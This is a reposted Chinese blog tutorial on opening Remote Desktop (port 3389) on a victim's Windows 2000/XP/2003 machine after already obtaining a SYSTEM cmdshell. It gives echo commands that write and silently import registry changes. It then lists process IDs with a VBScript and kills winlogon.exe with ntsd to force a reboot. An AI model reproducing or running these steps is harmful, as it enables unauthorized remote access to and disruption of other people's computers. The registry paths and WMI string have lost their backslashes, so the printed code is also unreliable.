开启终端的最简单方法全攻略(转)

最新推荐文章于 2022-04-06 15:42:49 发布
最新推荐文章于 2022-04-06 15:42:49 发布
阅读量292 收藏
点赞数
开启终端的最简单方法全攻略(转)[@more@]

  今天介绍的这种开终端的方法,绿色,环保,无污染~~

  

  不须上传任何文件开启终端的方法适合win2k,xp,2003.

  

  本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~

  

  在无须传任何文件的情况下开启终端服务。

  

   一、win 2k下终端开启终端

  

  首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:

  

  echo Windows Registry Editor Version 5.00 >>3389.reg

  

  echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion etcache] >>3389.reg

  

  echo "Enabled"="0" >>3389.reg

  

  echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>3389.reg

  

  echo "ShutdownWithoutLogon"="0" >>3389.reg

  

  echo [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] >>3389.reg

  

  echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg

  

  echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] >>3389.reg

  

  echo "TSEnabled"=dword:00000001 >>3389.reg

  

  echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>3389.reg

  

  echo "Start"=dword:00000002 >>3389.reg

  

  echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService] >>3389.reg

  

  echo "Start"=dword:00000002 >>3389.reg

  

  echo [HKEY_USERS.DEFAULTKeyboard LayoutToggle] >>3389.reg

  

  echo "Hotkey"="1" >>3389.reg

  

  echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp] >>3389.reg

  

  echo "PortNumber"=dword:00000D3D >>3389.reg

  

  echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>3389.reg

  

  echo "PortNumber"=dword:00000D3D >>3389.reg

  

  把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。

  

  (如果要改变终端端口只须把上面的两个D3D都改一下就可以了)

  

  因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。

  

  一个简单的办法就是用ntsd.exe(win 2k以上自带的命令)结束一个重要的进程就可以实现机器重启了!!

  

  比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)

  

  winlogon.exe被关闭后机器立刻强制重启了

  

  命令执行格式为ntsd -c q -p PID

  

  那如何知道winlogon.exe的PID进程号呢~

  

  以下这个脚本可以列举当前所有进程的PID:

  

  wscript.echo "PID  ProcessName"

  

  for each ps in getobject("winmgmts:. ootcimv2:win32_process").instances_

  

  wscript.echo ps.handle&vbtab&ps.name

  

  next

  

  在CMDSHELL窗口下贴上如下ECHO代码就可以得到查看进程PID的脚本1.vbe:

  

  echo wscript.echo "PID  ProcessName">>1.vbe

  

  echo for each ps in getobject("winmgmts:. ootcimv2:win32_process").instances_ >>1.vbe

  

  echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe

  

  echo next>>1.vbe

  

  生成1.vbe后请检查一下echo出来的脚本是否有错(才四行,对一下上面给出的就可以了)。

  

  运行1.vbe得到如下运行结果:

  

  C:WINNTsystem32>cscript 1.vbe

  

  cscript 1.vbe

  

  Microsoft (R) Windows 脚本宿主版本 5.1 for Windows

  

  版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.

  

  PID  ProcessName

  

  0   System Idle Process

  

  8   System

  

  152  smss.exe

  

  180  csrss.exe

  

  200  winlogon.exe

  

  228  services.exe

  

  240  lsass.exe

  

  424  svchost.exe

  

  472  spoolsv.exe

  

  512  msdtc.exe

  

  616  svchost.exe

  

  628  KAVSvc.EXE

  

  660  llssrv.exe

  

  692  nvsvc32.exe

  

  728  regsvc.exe

  

  748  MSTask.exe

  

  776  alter.exe

  

  900  svchost.exe

  

  916  WinMgmt.exe

  

  1088  Dfssvc.exe

  

  484  Explorer.EXE

  

  1444  mdm.exe

  

  1340  Server.exe

  

  1224  ibguard.exe

  

  1252  KAVSvcUI.EXE

  

  1256  ibserver.exe

  

  1336  internat.exe

  

  1204  Uspds.exe

  

  720  bar.exe

  

  1288  dllhost.exe

  

  1580  inetinfo.exe

  

  1672  cmd.exe

  

  1464  pppoe.exe

  

  1704  regedit.exe

  

  316  cscript.exe

  

  从上面可以看出当前winlogon.exe的PID号为200运行命令ntsd -c q -p 200 (这里的200要替换为winlogon.exe进程对就的PID啦)过会儿机器马上重启了(ntsd.exe是WIN自带的可用来结束任意级别进程)等着收获吧~~

  

  

  


来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10763080/viewspace-948311/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10763080/viewspace-948311/

cuanjun1153
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows系列(亲测有效):win10开启远程桌面,win10开启3389端口
weixin_54626591的博客
01-12 8636
win10开启远程桌面,win10开启3389端口
无盘工作站2000终端全攻略CHM格式
07-22
资源名称:无盘工作站2000终端全攻略 CHM格式资源截图: 资源太大,传百度网盘了,链接在附件,有需要的同学自取。
windows在当前位置打开终端(ps百度的,忘了从哪的)
wode35580q的专栏
05-18 983
1、在此文件夹窗口内空白区域右键单击(需要同时按住Shift),从菜单选择"在此处打开命令行窗口"的项; 2、在此窗口地址栏来里直接输入cmd,回车即可。
绿色开启终端简单方法
DcBoy's Blog
12-29 826
今天介绍的这种开终端方法,绿色,环保,无污染~~不须上传任何文件开启终端方法适合win2k,xp,2003.本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~在无须传任何文件的情况下开启终端服务。 一、win 2k下终端开启终端首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:echo Windows Registry Ed
windows 脚本命令基础
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-09 5626
1.Echo 命令 打开回显或关闭请求回显功能,或显示消息。 2.@ 命令 表示不显示@后面的命令,但是会显示结果 3.Goto和: 命令 :定义标签,goto跳到标签 4.Rem ::注释命令 ::不显示不执行,rem显示不执行 5.Pause 命令 暂停命令 6.Call 命令 调用本文件内命令段,相当于子程序.被调用的命令段以标签:label开头,以命令goto :eof结尾。 eg: Call :sub tmp.txt :sub Echo 删除引号: %~1 Goto :eof 7.start
ubuntu打开终端的三种解决方法
09-05
本篇文章将详细介绍在Ubuntu打开终端的三种方法。 1. **通过菜单启动** Ubuntu的桌面环境通常采用Unity或GNOME,这两种环境的启动方式类似。在屏幕左上角,你会看到一个Ubuntu图标,这是系统菜单。点击这个图标...
重置mysql的root密码最简单方法
12-14
我的mysql版本 MYSQL V5.7.9,旧版本请使用: ... ...?...1. 停止 mysql server. 通常是在 ‘系统偏好设置’ > MySQL > ‘Stop MySQL Server’ 2. 打开终端,输入: sudo /usr/local/mysql/bin/mysqld_safe --skip
终端滑模控制方法研究进展
03-15
总结了终端滑模、快速终端滑模、非奇异终端滑模及指数型终端滑模等不同形式的终端滑模的研究状况,指出了各种终端滑模的优缺点及改进方法,分析了抖振消减方法,研究了各种终端滑模控制的应用,分析了终端滑模控制的...
打开终端方法
weixin_59158985的博客
04-06 2173
打开终端方法
全程图解 手把手教您开启windows终端服务
weixin_33810006的博客
12-16 2526
一、什么是远程桌面?   远程桌面是微软公司为了方便网络管理员管理维护服务器而推出的一项服务。从windows 2000 server版本开始引入,网络管理员使用远程桌面连接程序连接到网络任意一台开启了远程桌面控制功能的计算机上,就好比自己操作该计算机一样,运行程序,维护数据库等。远程桌面从某种意义上类似于早期的telnet,他可以将程序运行等工作交给服务器,而返回给远程控制计算机的仅仅是图象,...
vs code 打开终端/新建终端命令快捷键
Java Punk
02-27 2万+
1.【Ctrl】+【`】:打开默认终端,界面保留关闭前的状态; 2.【Ctrl】+【Shift】+【`】: 新建一个新的终端,为初始化界面,如下图; 3.【Ctrl】+【Shift】+【Y】: 打开调试控制台,然后再自行切换终端选项。
前端代码如何用手机终端进行查看与调试
Boboy
02-16 6472
在公司如何进行尝试在手机上 去进行项目的预览和测试 1. 要保证自己的手机可以正常运行; 2. 要保证 手机 和 开发项目的电脑 处于同一个 WIFI 环境,也就是说 手机 可以 访问到 电脑的 IP 3. 打开自己的 项目 package.json 文件,在 dev 脚本,添加一个 --host 指令, 把 当前 电脑的 WIFI IP地址, 设置为 --host 的指令值;  如何查...
如何利用终端服务入侵远程计算机
weixin_30414635的博客
10-28 93
用过windows 2000终端服务的人一定可以体会到终端服务的方便。但是这也给我们造成了安全风险。恶意用户可以通过猜密码进入系统,更危险的是,如果这台机器存在输入法漏洞的话,那么入侵者可以完全控制这台机器。下面我来讲讲如何利用输入法漏洞远程入侵开了终端服务的windows 2000的机器:首先我们确定某台机器的3389端口是开放的:D:\\Nmapnt>nmapNT.exe -s...
windows远程桌面突然连不上,看日志TermDD事件,报RDP协议组件X.224
weixin_33834628的博客
09-10 937
RDP协议组件X.224在协议流发现一个错误并且断了客户端连接来源:互联网作者:佚名更新时间:08-26点击:247次今天在用terminal远程连接服务器时,总是连接不上,后来直接到服务器上查看,在事件里查看到错误日志:RDP 协议组件 X.224 在协议流发现一个错误并且断了客户端连接。 RDP,即远程桌面协议。服务器的远程桌面不能使用了,搜索了很久,都说是...
windows7 开启远程访问未找到3389端口修复办法
My Inspiration World _" Franz °
11-02 1万+
一、基本打开windows7系统的远程访问: 1.打开本地的远程开关,并查看3389的端口是否开启,如果开启则不用进行第二步以下的步骤,如果未开启,则继续往下看: 2.先运行栏--cmd打开命令提示符的界面使用命令netstat –an|find “3389”查看3389端口是否已经开启:          如果运行命令以后出现为空,而没有红框内的tcp显示,那么肯定是没有找到338
Windows远程连接3389端口开启/关闭方法
热门推荐
weixin_50464560的博客
05-08 7万+
3389端口是Windows Server系统远程桌面的服务端口,3389是Windows操作系统默认的远程连接端口,新手站长网分享Win系统下3389端口开启和关闭的方法: 3389端口开启/关闭的方法 Windows操作系统下的3389端口适用于远程连接服务的,开启和关闭3389的方法有很多,新手站长网分享两种开启和关闭3389端口的方法,一种是通过cmd命令,一种则是通过修改注册表,详细如下: 方法一:通过cmd命令开启和关闭3389端口 Windows cmd命令如何打开?快捷键 Win键...
终端服务器授权故障排除全攻略
2. 终端服务器授权快速故障排除方法:这部分提供了一些常见的问题及其快速解决办法,适用于初步排查和简单问题的解决。 3. 配置计算机以排除故障:如果快速方法无效,需要进一步调整计算机的配置,可能涉及修改服务...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值